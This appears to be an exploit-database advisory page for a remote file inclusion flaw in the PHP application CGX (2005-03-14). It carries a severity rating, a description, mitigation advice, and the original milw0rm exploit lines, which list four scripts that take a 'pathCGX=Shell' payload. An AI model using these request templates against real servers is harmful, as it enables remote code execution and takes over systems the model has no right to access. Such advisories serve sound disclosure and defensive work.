header-logo
Suggest Exploit
vendor:
CGX
by:
GolD_M
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: CGX
Affected Version From: CGX 2005-03-14
Affected Version To: CGX 2005-03-14
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

CGX 2005-03-14 (pathCGX) Remote File Include Vulnerabilities

The CGX 2005-03-14 application is vulnerable to remote file inclusion attacks. An attacker can exploit this vulnerability by sending a specially crafted request to the 'inc/mtdialogo.php', 'inc/ltdialogo.php', 'inc/login.php', or 'inc/logingecon.php' script with the 'pathCGX' parameter set to a malicious file. This allows the attacker to execute arbitrary code on the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the CGX application to a patched version that addresses the remote file inclusion vulnerability. Additionally, it is recommended to implement strong input validation and filtering mechanisms to prevent malicious file inclusion.
Source

Exploit-DB raw data:

# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerablites
# D.Script: http://codigolivre.org.br/frs/?group_id=413&release_id=1978
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/
# Greetz To: Tryag-Team ...$$

# milw0rm.com [2007-05-08]

Navigation

Suggest Exploit

Services By CQR